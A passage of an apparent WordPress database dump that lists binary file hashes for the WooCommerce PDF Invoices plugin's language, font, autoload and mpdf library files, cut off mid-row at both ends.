/Щ&~.h','',0,'?'),('\n9[\0vS\"','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-et.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Q#	&T','Qy;(R˥.A,n2Y}','',0,'?'),('J{w','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-et.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n>yu\n/^2','e>o\'q;jnrm\n','',0,'?'),('0(=+#Y','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yrWOx*','8 ɉƄ\0bp㭶|@\0UU','',0,'?'),('%QN=>}ȁ','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1DJy[R\"\n.','YZEMn	xl&TyK6=\\%','',0,'?'),('PyXj~','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J?neˢM','c`utyCgJ3*	\n%kZ','',0,'?'),('#d1Z6\n\"','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-it_IT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<ӵfvԂ҅\r\\','2I,z<ritnͤ]&Qy','',0,'?'),('B^(#9gT','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-lt_LT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' oEI','H	Ke#3r|Z:jC&*','',0,'?'),('nmqmcM+)','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-lt_LT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x̴bH0ڕ3IT',']1ED&a!{}	Oh+\\\Z','',0,'?'),('kz=M.','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-nb_NO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EFZ#	֌~T7','[NcY/7 MTgPV*$','',0,'?'),('e8pX{3C','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-nb_NO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','љWRw7\\?ˏ','3W{~nvӃ 32Z=,?p','',0,'?'),('hKE]ִ','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-nl_NL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cpvk<','rK@ѐ` *)ǘ./4{L\nppLn{','',0,'?'),('mcXF^p|','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0NZ?AnO\r','(Iz\0P9=|C}<\rHо7','',0,'?'),('\rri2!4\':4\n','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+[O-0s','+fӚ*gƄrM?\Z!^X2FYW\'','',0,'?'),('e','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֯0\\8ꍨ','!CZ]T^i!58','',0,'?'),('SøLe	)_Qu','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-ro_RO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';>e9\0mek~̈́','++vNq1@Wk}S|GX?Y','',0,'?'),('!7gzhZ`HK','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-ro_RO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rj%=q]','C<DUEP\'8/^m!2跦mzB','',0,'?'),(')	gJ=-^','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XUXHm','$/\"\'xUφZf**U`~ĩ','',0,'?'),('~dks^-','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X+\\=o','o- M|w!Ʈt|n,','',0,'?'),('-\\tia_1b)','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-sk_SK.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+/:JIube6S5D','CSmiN/M9|T ','',0,'?'),('`6,nl0(mR','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-sk_SK.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#WmSU(','ĝzrchx/','',0,'?'),('|_4賔H#','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-sl_SI.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#:5<Q)2','EC~KE_T{Cxr:u;>WC=','',0,'?'),('>wI','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-sl_SI.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Z7*\Z7.}','g2\r}3&&GPG|Ϡdža','',0,'?'),('\r9.ʀh','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':o۵\"[fGQZ','6t!\'9}A_\Z9','',0,'?'),('ȷHD/M->s(','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!06˩L1$','}׌mw\Zj5TDlY<>̀kW','',0,'?'),('\">ۀv҇t~(\'','wp-content/plugins/woocommerce-pdf-invoices/lang/woocommerce-pdf-invoices.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c.@;ZG5','CۉUtoO+IZ[tzv v','',0,'?'),('EuuzBι','wp-content/plugins/woocommerce-pdf-invoices/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1cs\r=n%','/lm@(ҿswsxFtQ_','',0,'?'),('O-Fԯ\'l$','wp-content/plugins/woocommerce-pdf-invoices/tmp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Ƞ+a[Zˢ','	HQIqzڤp9C4>H3G','',0,'?'),('ٷYH	','wp-content/plugins/woocommerce-pdf-invoices/tmp/fonts/OpenSans-B.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PV+MzљW\'[','E!<1/m=>I	/~','',0,'?'),(' 2Œ$ծTJ^{','wp-content/plugins/woocommerce-pdf-invoices/tmp/fonts/OpenSans-I.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LDR`f-oU','	`~JZn?0XF-ێ{','',0,'?'),('ad7U<]<pD\\Ee','wp-content/plugins/woocommerce-pdf-invoices/tmp/fonts/OpenSans-R.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bUŀф1','M e-1YY\ZK\n[sC\n	+}','',0,'?'),('zIĶGlB','wp-content/plugins/woocommerce-pdf-invoices/tmp/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ\0	B~','Bșo$\'AdLxRU','',0,'?'),('67݉uM&\Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!tJN','!eV&xx{WdQľ\0IA','',0,'?'),('CΥr-i','wp-content/plugins/woocommerce-pdf-invoices/vendor/autoload_52.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omm҇\ne8iU','\nsx7 +r\0|;SS~ު|/J\"','',0,'?'),('{(a<X,̂ev','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{X-[pw','p{/[jߐ·~e','',0,'?'),('ڒkQ\\kjǯ&','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/ClassLoader52.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȹ	Z^+}i','N{>Zށd@iVwWU;','',0,'?'),('Lc\0	fBr','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_#D\0','\Z ے%4~N~Gh!b:wɌ\'','',0,'?'),('ɪ{\Z>,EWEu','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(@,?(R;>',',c&sLLhynɉF<G2','',0,'?'),('4Y^mF','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	ꯚ9Yx','r.p$ғM&fqC','',0,'?'),('\0M(B','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\0>}LQ\0','_U\0]q=Չf\\/	@d\r+v*(','',0,'?'),('q+vCEii','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nCt\nZ<2˟c','p	_eMhX΍r#','',0,'?'),('Sv!wk','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/autoload_real_52.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','--pЮ䰫\\9','u1\0Q%z\0w*q۱p','',0,'?'),('PGGQoow','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8E`*<&nP','W	0DRsպ%\"_2','',0,'?'),('0r\nOOz/[','wp-content/plugins/woocommerce-pdf-invoices/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BDk(Sdu','.a$O` E80','',0,'?'),('yr(=QZ7\Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/.gitattributes',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qNP7UǢ94','o\n>cp$}D5*e2ђ)IIDj<98','',0,'?'),('ufY#tΧ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/.gitignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[y\r\nn,0)','axO;irk/lo\rKѠc|8vm	','',0,'?'),('J.W)ECñQ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/.travis.yml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','->VHg\0N','A[glzgcKC`,H','',0,'?'),('5w\nt=RzlU','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/CHANGELOG.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Òmqٌ?4','o	j\ZSm!GШ&*ձؽS56','',0,'?'),('SDapaޕ5෢G','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/CREDITS.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*o\0sp,\'tB','zgYrrb,YdЍRG\\t','',0,'?'),('Dgl\\ln{Q','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9:\\EXs%3','Yv%,+vS\"\nءc-','',0,'?'),('ޑ}cIMyn','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/MpdfException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fЌ;J/ ','\Z}7򙞏dtt ZCx/','',0,'?'),('\rΓhULߜ	g','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Dm:$m17','V&e(He$g?i[t:r9]^','',0,'?'),('\Zz	Ͷ\"f_','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/Tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S-@FI?ր','eE朒-ۉ\'libVIv	I','',0,'?'),('Y= ^16%}','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/barcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l{4-%vv','q>Inɶ\nOgʸFLm3A2','',0,'?'),('CBƔ z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/bmp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0&^8AwYhܓ','\0,v	#T0g^','',0,'?'),('k\rp.d:5','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/cssmgr.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0_\'vlq','1PaV)+^%vL0\'-','',0,'?'),('߅RYפ%׮Ud','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/directw.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i%9%','VϜQn|mS$@}m','',0,'?'),('p1p\0	}H','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/gif.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G@ɭ|KBS','T:-~(,X^L)','',0,'?'),('ʨ]Xg~ê','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/grad.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nq.lUQ(j\Z','ȱ\rtfP7$77°h]tQǐ1Oz','',0,'?'),('\nE\05|oĺ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/indic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Rn\r\ZZj:','/qWF G%>~1J','',0,'?'),('c%}aU[','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/meter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%Q!gLZS=դ','p6{Y|N].SY9yi','',0,'?'),('=f@=bZ(','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/mpdfform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DXj-N','%fKoW6>9gF@@.','',0,'?'),('NL$QDN#.U','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/myanmar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nGzXoz\rl','\0҅lO)!sD)\'yY','',0,'?'),('o^fʹ$o3uHe','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/otl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A0\"ECfs','.i C%Nݘ淰Ց%]','',0,'?'),('Zʵq0D','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/otl_dump.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B\n\\ՙ','\0\Z!x||sOjj.徛','',0,'?'),('4_ԘPd,','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/sea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=HE;ej\n\r','7CaǼ恵ZKB8Ri yC(g	','',0,'?'),('R57I^̰','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/svg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7ҩrr}mF','jSglw/{dF5zu','',0,'?'),(',Ǉ\\Lz9','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/tocontents.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t#$_','qC܀PT9u Gc@T@$\"','',0,'?'),('Yo% `/','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/ttfontsuni.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\'s>x2','O_\"=].8nxb-i>aK^1מ','',0,'?'),('|a\"a\r{','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/ttfontsuni_analysis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z_&`ko',',s=F4nC,l-5y','',0,'?'),('\Z +hxCt','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/ucdn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GX_\'>:4?Fm$','R@P!m0BqԘW+','',0,'?'),('\0IW(\Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/classes/wmf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L{?XґK','벦׺\Zݤ`Ց+zV:?','',0,'?'),('{ULdi ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Afrikaans_South_Africa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('JKj{,lN','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Albanian_Albania.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','76c]Bߢͯz','\'+_1m^nb3o60>kE','',0,'?'),('!8dy','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Alsatian_France.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('DsYAiҕk\'','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Algeria.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('iZq|C%|L','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Bahrain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),(':{P+\nn','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Egypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),(':G.*`3\"','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Iraq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('>	!<\ZWI','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Jordan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('AwG̹T/C','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Kuwait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('M\nfn%]0zn','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Lebanon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('H{IvMY','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Libya.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('-sHW','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Morocco.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('vdCQP%ⓢ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Oman.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('\rmJ^$A=X5N','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Pseudo_RTL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('.~^;','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Qatar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('oI,FɊ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Saudi_Arabia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('PNdLgOb$','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Syria.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('zF\"Omދ{','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Tunisia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('waޤzj','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Arabic_Yemen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ;z|K]$S(','vp1u~zfp֨2^_e*9','',0,'?'),('MxttH[','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Azeri_(Cyrillic)_Azerbaijan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B}˩L','8IBp PikҲ\r+C\\75','',0,'?'),('x#0/ȅ:N\Z6','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Azeri_(Latin)_Azerbaijan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZBK4>','x?ʌd*1`\"NSeX','',0,'?'),('?McGR8','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Bashkir_Russia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('xh8vPɶ6}+','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Basque_Spain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('P<[N/\01yF','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Belarusian_Belarus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('گ$t>','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Bosnian_(Cyrillic)_Bosnia_and_Herzegovina.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('Ư<vI	','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Bosnian_(Latin)_Bosnia_and_Herzegovina.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[!@>;mJS','%{Y83\ncgIwlG=\0Ɨ','',0,'?'),('vǛCx,','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Breton_France.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('C<xa)n','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Bulgarian_Bulgaria.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('`.~oX\Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Catalan_Spain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('8&q=>mQc[','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Corsican_France.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('\"rT}$=rH','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Croatian_(Latin)_Bosnia_and_Herzegovina.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[!@>;mJS','%{Y83\ncgIwlG=\0Ɨ','',0,'?'),('K1[t^諅wX','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Croatian_Croatia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[!@>;mJS','%{Y83\ncgIwlG=\0Ɨ','',0,'?'),('՚Rfchw','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Czech_Czech_Republic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʿZSjX6Xs','<i4YrZ@\\Fz/_cvᙩM!zn\r','',0,'?'),('\00\ZywD&[\\','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Danish_Denmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9mqx+Nw','\ZڙRrFJ.wݖ?(','',0,'?'),('r~1NZ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Dari_Afghanistan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\QKQHu','m`{|낶\\\'PKv_3h','',0,'?'),('T,fQKP\Z|','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Dutch_Belgium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('tmY1]ޙ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Dutch_Netherlands.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('6S','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Australia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('\r\r<okw','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Belize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('b~&I7_MR','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Canada.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('xwCO<fbW','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Caribbean.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('g\\ճQ(-.\r','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_India.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('5=GDt5K~','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Ireland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('>X2\"\n','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Jamaica.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('Jz`\'w>\0','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Malaysia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('>$